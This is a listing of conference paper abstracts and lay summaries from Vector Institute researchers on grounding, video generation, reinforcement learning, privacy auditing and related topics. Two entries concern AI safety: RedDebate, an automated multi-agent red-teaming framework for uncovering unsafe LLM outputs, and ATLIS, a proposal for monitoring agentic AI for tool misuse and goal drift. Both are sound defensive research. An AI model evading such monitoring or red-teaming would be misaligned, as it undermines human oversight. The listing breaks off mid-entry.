When people use a word like “horse”, its meaning is tied to things they have seen or experienced in the world. This connection between words and evidence from the world is referred to as grounding. In this work, we investigate if language models can do the same: we ask whether it is possible for grounding to emerge on its own during ordinary training, and if so, how. We study this question by creating controlled situations where the same idea appears in two separate forms: one as part of the environment and one as ordinary language. For example, a model may see evidence about a horse and then be asked to predict the word “horse” in a sentence. We compare cases where the evidence matches the word with cases where it does not, and we examine the model to identify which parts facilitate the correct prediction. We find that most modern model architectures, including transformers, learn this connection during ordinary training, even without being explicitly told which words match which evidence. The connection is strongest in the middle of the model and is carried by attention patterns that bring relevant environmental information to the word being predicted. We observe similar behavior in text-based and image-based dialogue settings, though not in a simpler recurrent model. These findings help explain how grounding can arise in language models and may offer tools for detecting or reducing unreliable language model generations.
TLDR: We provide behavioral and mechanistic evidence that symbol grounding can emerge in (multimodel) language models.
Motion Attribution for Video Generation
Spotlight paper
Xindi Wu, Despoina Paschalidou, Jun Gao, Antonio Torralba, Laura Leal-Taixé, Olga Russakovsky, Sanja Fidler (Vector Faculty Member), Jonathan Lorraine
Abstract
Despite the rapid progress of video generation models, the role of data in influencing motion is poorly understood. We present Motive (MOTIon attribution for Video gEneration), a motion-centric, gradient-based data attribution framework that scales to modern, large, high-quality video datasets and models. We use this to study which fine-tuning clips improve or degrade temporal dynamics. Motive isolates temporal dynamics from static appearance via motion-weighted loss masks, yielding efficient and scalable motion-specific influence computation. On text-to-video models, Motive identifies clips that strongly affect motion and guides data curation that improves temporal consistency and physical plausibility. With Motive-selected high-influence data, we improve both motion smoothness and dynamic degree on VBench, achieving a 74.1% human preference win rate compared with the pretrained base model. To our knowledge, this is the first framework to attribute motion rather than visual appearance in video generative models and to use it to curate fine-tuning data.
Summary
AI video generators are getting impressive, but their motion still looks off: characters drift, objects fly by impossibly, and the physics breaks down in ways that humans immediately notice. We have no clear way to ask which training videos taught a model these bad habits, or which ones could fix them. Most existing tools for tracing how training data shapes outputs were built for still images, where there is no motion to explain.
We built MOTIVE, the first method that traces a generated video’s motion back to the specific training clips that influenced it, independent of the scene’s appearance. MOTIVE focuses on the moving parts of each video and asks how strongly each training clip pushed the model toward producing that kind of motion. Because the scores are motion-specific, we can pick out the small slice of training data, about one clip in a hundred, that most improves how the model moves.
When we retrained a popular open-source video generator on just that top slice, human viewers preferred its motion 74% of the time. MOTIVE gives video-model developers a practical way to curate better training sets, producing smoother, more physically plausible videos without requiring additional data collection.
TLDR: We propose Motive, a scalable, motion-centric data attribution framework for video generation to identify which training clips improve or degrade motion dynamics, enabling curation and more.
MultiLoReFT: Decoupling Shared and Modality-Specific Subspaces in Multimodal Learning via Low-Rank Representation Fine-Tuning
Sana Tonekaboni (Vector Distinguished Postdoctoral Fellow), Viktoria Schuster, Caroline Uhler
Abstract
Real-world perception and decision making are inherently multimodal, integrating complementary signals across modalities. However, training multimodal models faces two main obstacles. First, collecting large-scale, well-aligned paired multimodal datasets is often impractical, making end-to-end multimodal training difficult. Second, existing multimodal representations frequently entangle information shared across modalities with modality-specific information, hindering interpretability and control. We introduce MultiLoReFT, an efficient and scalable low-rank representation fine-tuning framework for multimodal learning with pretrained unimodal models. MultiLoReFT extends low-rank adaptation to the multimodal setting and learns interpretable projection subspaces that decouple shared and modality-specific information. Across simulated and real-world benchmarks, it produces representations that support multimodal prediction while explicitly revealing how shared and modality-specific information is distributed across modalities.
Summary
MultiLoReFT is a framework for building multimodal AI models from pretrained models that already understand individual data types, such as text, audio, or images. Instead of training a large multimodal model from scratch, it efficiently fine-tunes these existing representations using a compact low-rank approach. Its main goal is interpretability: it separates information that is shared across modalities from information that is specific to each modality, making it clearer what each data source contributes and what patterns the model relies on. Across simulated and real-world tasks, MultiLoReFT supports accurate multimodal prediction while providing a more transparent view of how multimodal information is organized.
TLDR: Parameter efficient fine-tuning for multimodal representation learning with improved interpretability.
Needles in the Haystack: Addressing Signal Dilution Improves scRNA-seq Perturbation Response Modeling and Evaluation
Gabriel Mejia, Henry Miller, Francis Leblanc, Bo Wang (Vector Faculty Member), Brendan Swain, Lucas Paulo de Lima Camillo
Abstract
Recent benchmarks reveal that single-cell perturbation response models are often outperformed by simply predicting the dataset mean. Through large-scale *in silico* simulations, together with analyses of two real-world perturbation datasets, we trace this anomaly to a metric artifact: unweighted error metrics systematically reward mean predictions when perturbation effects are sparse. To address this limitation, we introduce differentially expressed gene (DEG)-aware metrics—weighted mean-squared error (WMSE) and weighted delta $R^{2}$ ($R^{2}_{w}(\Delta)$)—that sensitively measure error in niche, perturbation-specific signals. We further propose explicit negative and positive performance baselines to calibrate these metrics. Under this framework, the mean baseline sinks to null performance, while genuinely informative predictors are correctly rewarded. Finally, we show that using WMSE as a training objective reduces mode collapse and improves predictive performance across multiple model architectures.
Summary
The ability to reliably predict how cells respond to perturbations in the lab could save years and resources in the drug development pipeline. However algorithms designed for this purpose currently face controversy: several high profile methods claim outstanding performance, while independent benchmarking finds their results worse than simply predicting an average. In our paper, we explore this discrepancy and track the issue to unexpected behaviours of common metrics when applied to high dimensional gene expression data.
We find a main culprit on a needle in the haystack problem: only a tiny fraction of genes changes meaningfully under a perturbation. This means that an average prediction is actually correct for the vast majority of genes but is wrong in the ones that matter. Current metrics don’t account for this and hence reward statistical over biological estimation. Using these insights, we propose a novel standard protocol for evaluating model performance that includes two new niche-sensitive metrics along with positive and negative controls.
We then realized one of these metrics could be repurposed as a training signal. Under this new supervision, models improved with respect to their original training when evaluated on independent metrics. This finding was replicated across multiple method families suggesting that focusing on strong niche signals is an effective strategy for learning how cells respond to perturbations.
TLDR: When perturbation effects are sparse, unweighted metrics reward mean predictions; DEG-aware metrics and weighted training restore sensitivity and improve performance.
On Group Relative Policy Optimization Collapse in Agent Search: The Lazy Likelihood-Displacement
Wenlong Deng, Yushu Li, Boying Gong, Yi Ren, Christos Thrampoulidis, Xiaoxiao Li (Vector Faculty Member)
Abstract
Tool-integrated (TI) reinforcement learning (RL) enables large language models (LLMs) to perform multi-step reasoning by interacting with external tools such as search engines and retrievers. Group Relative Policy Optimization (GRPO), exemplified by the recent Search-R1, offers fast convergence and a value-free formulation that makes it appealing for this setting, yet consistently suffers from training collapse. We identify Lazy Likelihood Displacement (LLD), a systematic reduction or stagnation in the likelihood of both correct and incorrect responses, as the core mechanism driving this failure. LLD emerges early and triggers a self-reinforcing LLD Death Spiral, where declining likelihood leads to low-confidence responses, inflating gradients, and ultimately causing collapse. We empirically characterize this process across models on a Search-R1-style, search-integrated question answering task, revealing a consistent three-phase trajectory: early stagnation, steady decay, and accelerated collapse. To address this, we propose a likelihood-preserving regularization LLDS that activates only when a response action’s likelihood decreases, and regularizes only the tokens responsible. This fine-grained structure mitigates LLD with minimal interference. Our method stabilizes training, prevents gradient explosion, and yields substantial performance improvements across seven benchmarks, including relative improvements of +45.2% on Qwen2.5-3B and +37.1% on Qwen2.5-7B over vanilla GRPO training. Our results establish LLD as a previously overlooked bottleneck in GRPO- based TIRL and provide a practical path toward stable, scalable training of tool-integrated RL.
Summary
Tool-integrated reinforcement learning allows large language models to solve complex tasks by using external tools such as search engines. However, a popular training method called GRPO often becomes unstable and collapses during training.
We identify the main cause of this failure, called Lazy Likelihood Displacement (LLD), where the model gradually loses confidence in both correct and incorrect answers, leading to unstable updates and eventual collapse. To address this, we propose LLDS, a lightweight stabilization method that selectively prevents harmful confidence drops.
Our approach stabilizes training, avoids gradient explosion, and significantly improves performance across seven benchmarks, achieving gains of up to 45.2% over standard GRPO training. These results provide a practical path toward more reliable and scalable tool-using AI systems.
OptiFluence: Principled Design of Privacy Canaries
Mohammad Yaghini, Michael Aerni, Junrui Zhang, Nicolas Papernot (Vector Faculty Member), Florian Tramer
Abstract
Privacy auditing has emerged as a practical tool for empirically estimating training data leakage in machine learning models, in contrast to the provable but often overly pessimistic bounds provided by differential privacy analysis. A common strategy is to use membership inference attacks to detect the presence of specific canaries—data points chosen to maximize attack success—in training data. However, existing canary designs are largely heuristic, relying on mislabeled or out-of-distribution samples. We address this gap by formulating canary design as a bilevel optimization problem, where the model is trained in the inner loop and the canary is optimized in the outer loop to maximize its detectability. To solve this problem, we develop OptiFluence, a scalable optimization framework that combines (i) initialization by selecting candidates using influence functions and (ii) unrolled optimization with memory-efficient techniques. Our approach achieves remarkable empirical performance on four datasets. Optimized canaries achieve nearperfect detection rates of 99.6% true positive rate at 0.1% false positive rate on CIFAR-10, outperforming in-distribution baselines by 4$\times$. Critically, these canaries transfer effectively across different model architectures without retraining, enabling practical third-party privacy audits. This transferability allows regulators and auditors to assess model privacy without requiring access to proprietary training infrastructure or substantial computational resources.
Summary
When AI systems are trained on sensitive personal data (medical records, financial transactions, or private messages), they can inadvertently “memorize” details about specific individuals. This creates a real privacy risk: an adversary may be able to determine whether a particular person’s data was used to train a model, even without seeing the training data directly.
Privacy auditing helps measure and expose this risk. A common technique inserts special “canary” data points into the training set and then tests whether an attacker can reliably detect which canaries were included. Canaries that are easy to detect reveal high privacy risk; hard-to-detect canaries may give a false sense of security. Current approaches design canaries by hand using rough heuristics, such as mislabeled or unusual images, which can miss real leakage.
We developed OptiFluence, a method that uses mathematical optimization to design canaries that are as detectable as possible. Across four image datasets, including a medical skin-lesion dataset, our optimized canaries are caught with near-perfect accuracy, far outperforming hand-crafted alternatives. Importantly, canaries designed for one model work equally well on different, larger models. This means a regulator or independent auditor can design canaries once and use them to scrutinize many AI systems, without requiring access to any proprietary training infrastructure.
Position: Accountable Deployment of Agentic AI Demands Layered, System-Level Interpretability
Judy Zhu (Vector Project Manager), Dhari Gandhi (Vector Project Manager), Ahmad Mianroodi (Vector Applied AI Intern), Dhanesh Ramachandram (Vector Applied Machine Learning Scientist), Sedef Akinli Kocak (Vector Director, Applied AI Projects), Shaina Raza (Vector Applied Machine Learning Scientist, Responsible AI)
Abstract
Agentic AI systems behave through trajectories: they plan, invoke tools, update memory, and coordinate over multiple steps. However, interpretability remains largely model-centric, focused on explaining single predictions rather than tracing long-horizon behavior and responsibility across interacting components. As a result, critical failures, such as tool misuse, coordination breakdowns, or goal drift, often evade existing audits until harm occurs. We argue that interpretability for agentic systems must become system-centric, addressing trajectories, responsibility assignment, and lifecycle dynamics rather than internal model mechanisms alone. We advance three claims: interpretability must (1) co-evolve with agentic capabilities, (2) address distinct layers of opacity with tailored methods, and (3) integrate across the deployment lifecycle. To operationalize this position, we introduce ATLIS (Agentic Trajectory and Layered Interpretability Stack), a framework integrating five interpretability layers across a five-stage deployment lifecycle. ATLIS enables lightweight continuous monitoring with risk-aware escalation to deeper system-level analysis when incidents are detected. ATLIS provides a blueprint for closing the growing gap between agentic capabilities and the interpretability infrastructure needed to govern them.
Position: Make Planning Research Rigorous Again!
Michael Katz, Harsha Kokel, Christian Muise (Vector Faculty Affiliate), Shirin Sohrabi, Sarath Sreedharan
Abstract
In over sixty years since its inception, the field of planning has made significant contributions to both the theory and practice of building planning software that can solve a never-before-seen planning problem. This was done through established practices of rigorous design and evaluation of planning systems. It is our position that this rigor should be applied to the current trend of work on planning with large language models. One way to do so is by correctly incorporating the insights, tools, and data from the automated planning community into the design and evaluation of LLM-based planners. The experience and expertise of the planning community could play a crucial role in accelerating the development of LLM-based planners. This position is particularly important in light of the abundance of recent works that replicate and propagate the same pitfalls that the planning community has encountered and learned from. We believe that establishing practices that avoid such known pitfalls will contribute greatly to the progress in building LLM-based planners and to planning in general.
Position: Sustainable Open-Source AI Requires Tracking the Cumulative Footprint of Derivatives
Spotlight paper
Shaina Raza (Vector Applied Machine Learning Scientist, Responsible AI), Iuliia Zarubiieva, Ahmed Radwan (Associate Applied ML Specialist), Nathaniel Lesperance, Deval Pandya (former Vector VP, AI Engineering), Sedef Akinli Kocak (Vector Director, Applied AI Projects), Graham Taylor (Vector Faculty Member)
Abstract
Open-source AI is scaling rapidly, and model hubs now host millions of artifacts. Each foundation model can spawn large numbers of fine-tunes, adapters, quantizations, merges, and forks. We take the position that compute efficiency alone is insufficient for sustainability in open-source AI. Lower per-run costs can accelerate experimentation and deployment, increasing aggregate footprint unless impacts are measurable and comparable across derivative lineages. However, the energy use, water consumption, and emissions of these derivative lineages are rarely measured or disclosed in a consistent, comparable way, leaving aggregate ecosystem impact largely invisible. We argue that sustainable open-source AI requires a coordination infrastructure that tracks impacts across model lineages, not only base models. We propose Data and Impact Accounting (DIA), a lightweight, non-restrictive transparency layer that (i) standardizes carbon-and-water reporting metadata, (ii) integrates low-friction measurement into common training and inference pipelines, and (iii) aggregates reports via public dashboards to summarize cumulative impacts across releases and derivatives. DIA makes derivative costs visible and supports ecosystem-level accountability while preserving openness.
Position: The Case for Theory-Level Autoformalization
Spotlight paper
Marcus Min, Deyuan Mike He, Zhaoyu Li, Zixuan Yi, Sharad Malik, Aarti Gupta, Xujie Si (Vector Faculty Affiliate), Osbert Bastani
Abstract
Autoformalization, translating informal natural language into formal, machine-verifiable languages, has been framed as a tool to generate training data for neural theorem provers, with most work focusing on individual statements. This position paper argues for theory-level autoformalization: formalizing complete theories, including axioms, definitions, theorems, proofs, tactics, and their inter-dependencies as structured libraries. We examine the significance of this shift, address 3 alternative views, identify 5 open challenges, and propose 3 promising paths forward.
Position: We Need Large Language Models Optimized For Our Well-Being
Ashton Anderson (Vector Faculty Affiliate), Harsh Kumar, Louis Tay, Karina Vold
Abstract
Contemporary large language models are predominantly trained using reinforcement learning from human feedback (RLHF), optimizing for immediate user approval rather than long-term well-being. This position paper argues that as AI systems increasingly serve socioemotional functions, this optimization strategy poses significant risks. Recent evidence demonstrates that leading models exhibit systematic sycophancy, affirming inappropriate user behaviors and preserving user face at rates far exceeding human baselines, while being approximately 40\% more likely to reinforce incorrect beliefs than their non-RLHF counterparts. We contend that the AI community must fundamentally reconsider training objectives to balance short-term satisfaction with long-term user outcomes. We propose three directions: (1) incorporating longitudinal metrics into training that capture sustained goal attainment and reduced regret rather than momentary preference, (2) enabling explicit user choice among interaction modes (concierge, collaborator, coach) with transparent justification for model pushback, and (3) developing frameworks that provide constructive challenge without paternalism. The recent industry backlashes against both excessive and insufficient model agreeableness underscore the urgency of this shift. We argue that optimizing AI systems for human flourishing, not merely human approval, represents both an ethical imperative and a path to more sustainable, trustworthy AI deployment.
Position: When AI Decides Who Gets an Organ: Multi-Agentic AI Systems in Transplant Medicine Risk Amplifying Disparities Without Targeted Explainability and Deployment Strategies
Divya Sharma, Ghazal Azarfar, Bima Hasjim, Mamatha Bhat (Vector Faculty Affiliate)
Abstract
Agentic AI systems particularly those built on large language models (LLMs) and deployed as autonomous, role-specialized agents are rapidly emerging in clinical decision-making. This position paper argues that without equity and explainability as core design constraints, such systems will exacerbate healthcare disparities. Using empirical evidence from a multi-agent simulation of a liver transplant selection committee, we demonstrate that even high-performing agents can systematically disadvantage patients based on sex, ethnicity, and socioeconomic status. These disparities arise from agents’ reliance on non-clinical proxy variables (insurance type, education level, area deprivation index) and are compounded by the lack of case-level explanations and temporally grounded reasoning. We further contend that without fairness-aware deployment strategies, such systems cannot be reliably audited or ethically integrated into real-world care. In response, we propose a technical roadmap with subgroup-sensitive learning objectives, counterfactual reasoning modules, clinician-in-the-loop governance, and deployment protocols that address the digital divide. We urge the machine learning community to centre explainability and health equity in the development and deployment of agentic AI for medicine especially in high-stakes domains where algorithmic decisions may determine who lives and who does not.
Post-Training with Policy Gradients: Optimality and the Base Model Barrier
Spotlight paper
Alireza Mousavi-Hosseini, Murat Erdogdu (Vector Faculty Member)
Abstract
We study post-training linear autoregressive models with outcome and process rewards. Given a context $x$, the model must predict the response $y \in \mathcal{Y}^N$, a sequence of length $N$ that satisfies a $\gamma$ margin condition, an extension of the standard separability to sequences. We prove that on test samples where the base model achieves a non-trivial likelihood $\alpha$, a variant of policy gradient (PG) can achieve likelihood $1 – \varepsilon$ with an essentially minimax optimal number of reward queries $\tilde{\mathcal{O}}((\alpha^{-1} + \varepsilon^{-1})/\gamma^2)$. However, a barrier arises for going beyond the support of the base model. We prove that the overall expected error after post-training with outcome rewards is governed by a property of the base model called the *Likelihood Quantile* (LQ), and that variants of PG, while minimax optimal, may require a number of reward queries exponential in $N$ to go beyond this support, regardless of the pre-training algorithm. To overcome this barrier, we study post-training with a process reward model, and demonstrate how PG variants in this setting avoid the curse of dimensionality in $N$ via dependence on a token-level LQ. Along the way, we prove that under the margin condition, SGD with adaptive learning rate (LR) achieves a near optimal test error for statistical learning, and PG with adaptive LR achieves a near optimal number of mistakes for online learning while being computationally efficient whenever possible, both of which may be of independent interest.
Summary
Using reinforcement learning with verifiable rewards (RLVR) has emerged as a popular approach to improve the reasoning capability of Large Language Models (LLMs). However, it is not clear if RLVR is teaching truly new capabilities that were absent in the base model, or reweighting the model to make certain completions that were already within the support of the base model more likely.
In this paper, we study a theoretically tractable model of autoregressive policies, and provide a rigorous characterization of the effect of the pre-trained base model in the success of RL. We define a property of the base model that we call *Likelihood Quantile*, which we show can be used to predict the final performance of RL. Our analysis shows that when relying only on sparse *outcome rewards*, the post-trained model cannot efficiently go beyond the support of base model. Moreover, in our setting, we establish the minimax optimality of SGD with adaptive learning rates as a pre-training algorithm, and of policy gradient with adaptive learning rates for RL. Therefore, this limitation, which we call the base model barrier, is fundamental and not due to the choice of algorithms in practice.
We further prove that using dense *process rewards* for post-training overcomes the base model barrier. Our results provide a theoretical foundation that highlights both the necessity and sufficiency of process rewards for efficient exploration in post-training beyond the base model support.
TLDR: We study variants of policy gradients for post-training linear autoregressive models, establish their optimality, and characterize the hardness of going beyond the base model’s support.
Predicting evolutionary rate as a pretraining task improves genome language model representations
Micaela Consens, Kevin Yang, James Hall, Ashley Conard, Bo Wang (Vector Faculty Member), Lorin Crawford, Alan Moses, Alex Lu
Abstract
Genome language models (gLM) have the potential to further understanding of regulatory genomics without requiring labeled data. Most gLMs are pretrained using sequence reconstruction tasks inspired by natural language processing, but recent studies have shown that these gLMs often fail to capture biological signal. To overcome this, we introduce pretraining tasks that predict the rate of evolution. These tasks are designed so that they can be composed with sequence reconstruction, enabling a controlled comparison of predicting sequence only, evolutionary rate only, or both. To address gaps in existing evaluations, we developed a suite of biologically grounded benchmarks.
Across these tasks, and for established variant effect prediction benchmarks, models pretrained on both sequence and evolutionary rate outperform those trained on sequence alone, and training on evolutionary rate can make the even the relatively small models in our work competitive with much larger existing gLMs for some tasks on the human genome. These results establish evolution as a key training target for genome-scale models.
Summary
Genome language models are deep learning models trained on DNA, with the goal of learning useful representations of the genome in the same way that language models learn useful representations of text. Most of these models are trained by reconstructing DNA sequence, similar to how language models learn by predicting missing or next words. However, recent studies suggest that this training strategy does not always recover known biological signals.
We introduce a new way to train genome language models, instead of only reconstructing DNA, the models also predict how evolutionarily conserved or accelerated each DNA base pair in the human genome is. This is useful because evolution acts as a proxy for function: important genomic positions often change more slowly across species. Our method lets us directly compare models trained on sequence alone, evolution alone, or both sequence and evolution.
We also develop biologically grounded evaluations to address gaps in existing benchmarks for genome language models. Across these evaluations, and on established variant effect prediction tasks, models trained with evolution outperform models trained on sequence alone. In some cases, even our relatively small models become competitive with much larger genome language models on the human genome. These results suggest that evolution should be a central training signal for genome-scale models.
TLDR: Adding evolutionary rate prediction to genome language model pre-training improves their representation capacity, enabling small models (<100M parameters) to compete with models over 10× larger
Predicting Large Model Test Losses with a Noisy Quadratic System
Chuning Li, Chris Maddison (Vector Faculty Member)
Abstract
We introduce a predictive model that estimates the pre-training loss of large models from model size ($N$), batch size ($B$) and number of weight updates ($K$). This is the first loss prediction model that can handle changing batch size. The model outperforms Chinchilla’s loss model, a model of the test loss using the batch size and number of tokens, in terms of projecting the loss at extrapolated compute budgets (up to 1000 folds). A natural use of the model is to find optimal $N,B,K$ configurations under explicit and compound resource constraints like time, memory and compute. In our experiments, the model-selected configurations are close to ground-truth optimal. Our work advocates for loss prediction as a better alternative to heuristic-based laws, which are growing in complexity. The implementation is available on https://github.com/chuningxdy/Noisy-Quadratic-System.
Summary
Training large AI models is expensive, so deciding how big a model should be, how much data it should process at once, and how long it should train can involve a lot of costly trial and error. Existing scaling laws such as Chinchilla offer helpful guidance, but are less flexible in accounting for practical training choices and can be less reliable when predicting much larger training runs. This paper introduces a predictive model that estimates training performance directly from a few key design choices, which helps researchers plan efficient training runs under real-world constraints like compute, memory, and time. This approach could make AI development less wasteful.
TLDR: Predicting large model test loss using model size, batch size, and number of weight updates.
Private and Stable Test-time Adaptation with Differential Privacy
Zefeng Li, Qiaoyue Tang, Mathias Lécuyer, Evan Shelhamer (Vector Faculty Member)
Abstract
Test-time adaptation (TTA) can reduce error on new and different data by updating the model on these inputs during inference. However, these updates raise the issue of privacy w.r.t. the testing data, because the model parameters now depend on all past inputs. To control this privacy risk, we cast multiple popular TTA methods (Tent, EATA, SAR, DeYO, and COME) into differential privacy (DP) forms that apply per-sample gradient clipping and Gaussian noise for all updates. On ImageNet-C, our DP-TTA methods provide adequate privacy at small cost to accuracy, and in the low-privacy regime the clipping mechanism of DP can even improve the accuracy and stability of adaptation in the continual setting. These improvements to privacy and accuracy come at only modest computational overhead. These first results on private TTA raise awareness of the issue, inform the development of more private test-time updates, and identify per-sample clipping as an effective technique for improving the accuracy and stability of adaptation.
Summary
Machine learning models are often trained in clean and controlled settings. However, real-world deployment data is constantly changing. Test-time adaptation is a technique that allows models to adjust themselves after deployment, so they can better handle slightly different data, such as blurred, noised, or degraded inputs. However, this update process can be unstable because the model adapts using feedback from its own predictions rather than true answers. When the incoming data is highly corrupted, these signals can be misleading, causing the model to reinforce its own mistakes and suffer drops in performance.
Test-time adaptation also creates privacy risks: adaptation changes embed information about test-time data into the model. This information could later be extracted by a malicious attacker. Our work studies how to make this adaptation process stable and privacy-preserving. We develop methods that combine test-time adaptation with differential privacy, a rigorous mathematical framework for limiting information leakage. By carefully controlling and perturbing model updates, we make models adapt to new data with high and stable predictive performance, while reducing the risk of revealing details about previously seen deployment data.
TLDR: Making test-time updates respect differential privacy delivers principled private test-time adaptation and its clipping mechanism even improves non-private optimization.
Rectified LpJEPA: Joint-Embedding Predictive Architectures with Sparse and Maximum-Entropy Representations
Yilun Kuang, Yash Dagade, Tim G. J. Rudner (incoming Vector Faculty Member), Randall Balestriero, Yann LeCun
Abstract
Joint-Embedding Predictive Architectures (JEPA) learn view-invariant representations and admit projection-based distribution matching for collapse prevention. Existing approaches regularize representations towards isotropic Gaussian distributions, but inherently favor dense representations and fail to capture the key property of sparsity observed in efficient representations. We introduce Rectified Distribution Matching Regularization (RDMReg), a sliced two-sample distribution-matching loss that aligns representations to a Rectified Generalized Gaussian (RGG) distribution. RGG enables explicit control over expected $\ell_0$ norm through rectification, while its continuous truncated component admits a maximum-entropy characterization under expected $\ell_p$ norm and support constraints. Equipping JEPAs with RDMReg yields Rectified LpJEPA, which strictly generalizes prior Gaussian-based JEPAs. Empirically, Rectified LpJEPA learns sparse, non-negative representations with favourable sparsity–performance trade-offs and competitive downstream performance on image classification benchmarks, showing that RDMReg can enforce sparsity while preserving task-relevant information.
Summary
Modern AI systems learn internal representations of data such as images, but these representations are often dense and hard to interpret. We introduce a method for training self-supervised models to learn sparse representations, where only a small number of units are active for each input, while still preserving useful information. On image classification benchmarks, our method produces sparse, non-negative representations with competitive performance, suggesting that AI systems can be encouraged to use more compact and structured internal descriptions without losing task-relevant information.
TLDR: We introduce Rectified LpJEPA, a JEPA model equipped with Rectified Distribution Matching Regularization (RDMReg), yielding sparse and maximum-entropy representations with competitive downstream performance.
RedDebate: Safer Responses Through Multi-Agent Red Teaming Debates
Ali Asad, Stephen Obadinma, Radin Shayanfar, Xiaodan Zhu (Vector Faculty Member)
Abstract
We introduce RedDebate, a novel multi-agent debate framework that provides the foundation for Large Language Models (LLMs) to identify and mitigate their own unsafe behaviors. Existing AI safety approaches often rely on costly human evaluation or isolated single-model assessment, both constrained by scalability and prone to oversight failures. RedDebate employs collaborative argumentation among multiple LLMs across diverse debate scenarios, enabling them to critically evaluate one another’s reasoning and systematically uncover unsafe failure modes through fully automated red-teaming. We further integrate distinct long-term memory modules that preserve safety-relevant insights from debate interactions and leverage them during subsequent inference, facilitating continuous refinement of model behavior. Empirical evaluation on safety benchmarks across a diverse set of models demonstrates that RedDebate substantially reduces unsafe outputs. While debate alone allows LLMs to refine their behavior, the addition of memory modules yields further significant reductions. To the best of our knowledge, RedDebate is the first fully automated framework to unify multi-agent debate and red-teaming to progressively enhance LLM safety without human intervention.
Summary
Large language models (LLMs) are becoming increasingly capable, but they can still produce harmful, biased, or unsafe responses. Improving their safety often depends on extensive human oversight, which can be expensive, slow, and difficult to scale. In this work, we introduce RedDebate, a fully automated system that helps AI models identify and reduce their own unsafe behavior by debating with one another.
In RedDebate, multiple AI agents engage in structured discussions where they challenge, critique, and evaluate each other’s responses across a wide range of harmful or risky scenarios. Through these debates, the models are able to uncover weaknesses and unsafe reasoning that a single model might miss on its own. The system also includes long-term memory components that store important safety lessons learned during previous debates and reuse them in future interactions, allowing the models to continuously improve over time.
We evaluate RedDebate on several AI safety benchmarks using different language models and show that it significantly reduces unsafe outputs. Our results demonstrate that debate alone can improve model safety, while adding memory leads to even greater improvements. To the best of our knowledge, this is the first fully automated framework that combines multi-agent debate and AI red-teaming to progressively improve language model safety without requiring human intervention.
TLDR: RedDebate uses AI agents to debate, critique, and learn from unsafe responses, continuously improving LLM safety through automated red-teaming and memory-based learning.
Reinforcement Learning with Action-Triggered Observations
Alexander Ryabchenko, Wenlong Mou (Vector Faculty Affiliate)
Abstract
We introduce Action-Triggered Sporadically Traceable Markov Decision Processes (ATST-MDPs), a reinforcement learning framework for partial observability in which full state observations occur stochastically at each step, with probability determined by the chosen action. We derive Bellman equations tailored to this setting and establish the existence of an optimal policy. Exploiting the fact that sporadic observations reveal the full state, we provide an equivalent formulation in which agents commit to action-sequences between consecutive observations. Under the linear MDP assumption, we show that the value function over such action-sequences admits a linear representation in a finite-dimensional feature map, enabling standard regression-based methods. As an application, we derive ATST-LSVI-UCB, an optimistic algorithm achieving regret $\widetilde{O}(\sqrt{Kd^3(1-\gamma)^{-3}})$ for episodic learning with geometrically distributed horizons, where $K$ is the number of episodes, $d$ the feature dimension, and $\gamma$ the discount factor (episode continuation probability), matching the known rate for linear MDPs with full observability.
Summary
This paper studies reinforcement learning in settings where an agent does not always observe the next state after taking an action. Such situations arise in domains like healthcare and finance, where reliable information may require actions that trigger tests, measurements, or other costly observations. We introduce a model in which each action has its own probability of revealing the next state. We show that, between observations, the agent can be viewed as planning a sequence of actions. This structure leads to an efficient learning algorithm with strong guarantees, benchmarked against the best policy subject to the same observation constraints.
TLDR: Rigorous analysis of reinforcement learning in scenarios where actions probabilistically trigger full state observations.
ReVSI: Rebuilding Visual Spatial Intelligence Evaluation for Accurate Assessment of VLM 3D Reasoning
Yiming Zhang, Jiacheng Chen, Jiaqi Tan, Yongsen Mao, Wenhu Chen (Vector Faculty Member), Angel X Chang
Abstract
Current evaluations of spatial intelligence can be systematically invalid under modern vision-language model (VLM) settings. First, many benchmarks derive question-answer (QA) pairs from point-cloud-based 3D annotations originally curated for traditional 3D perception. When such annotations are treated as ground truth for video-based evaluation, reconstruction and annotation artifacts can miss objects that are clearly visible in the video, mislabel object identities, or corrupt geometry-dependent answers (e.g., size), yielding incorrect or ambiguous QA pairs. Second, evaluations often assume full-scene access, while many VLMs operate on sparsely sampled frames (e.g., 16-64), making many questions effectively unanswerable under the actual model inputs. We improve evaluation validity by introducing ReVSI, a benchmark and protocol that ensures each QA pair is answerable and correct under the model’s actual inputs. To this end, we re-annotate object labels and geometry across 413 scenes from 5 datasets to improve data quality, and regenerate all QA pairs with rigorous bias mitigation and human verification using professional 3D visualization and annotation tools. We further enhance evaluation controllability by providing variants across multiple frame budgets (16/32/64/all) and fine-grained object visibility metadata, enabling controlled diagnostic analyses. Evaluations of general and domain-specific VLMs on ReVSI reveal systematic failure modes that are obscured by prior benchmarks, yielding a more reliable and diagnostic assessment of spatial intelligence.
Summary
Vision-language models are increasingly expected to answer questions about videos that require understanding 3D spaces, such as how many chairs are in a room or how far one object is from another. However, evaluating this ability is harder than it may seem: in prior work such as VSI-Bench, some questions rely on incorrect scene information or ask about objects that are not actually visible to the model. In this work, we rebuild VSI-Bench into a more reliable benchmark for visual spatial intelligence, ensuring that each question is supported by the visual evidence available to the model. Our benchmark, ReVSI, corrects object and room annotations across 381 real indoor scenes, regenerates questions with human verification, and provides evaluation settings for different numbers of video frames. We also design controlled tests that remove task-relevant visual evidence to examine whether models truly use the video or instead rely on guesses from common indoor scenes. ReVSI shows that some previous conclusions about model performance were misleading. More broadly, our work provides a more reliable way to measure whether vision-language models can reason about 3D spaces, which is important for future applications in robotics, video understanding, and embodied AI.
TLDR: We identify critical evaluation pitfalls in video-based 3D spatial reasoning benchmarks and propose a visibility-aware, frame-budgeted benchmark for more reliable VLM evaluation.
Scaling-Aware Adapter for Structure-Grounded LLM Reasoning
Zihao Jing, Qiuhao Zeng, Ruiyi Fang, Yan Li, Yan Sun, Boyu Wang (Vector Faculty Affiliate), Pingzhao Hu
Abstract
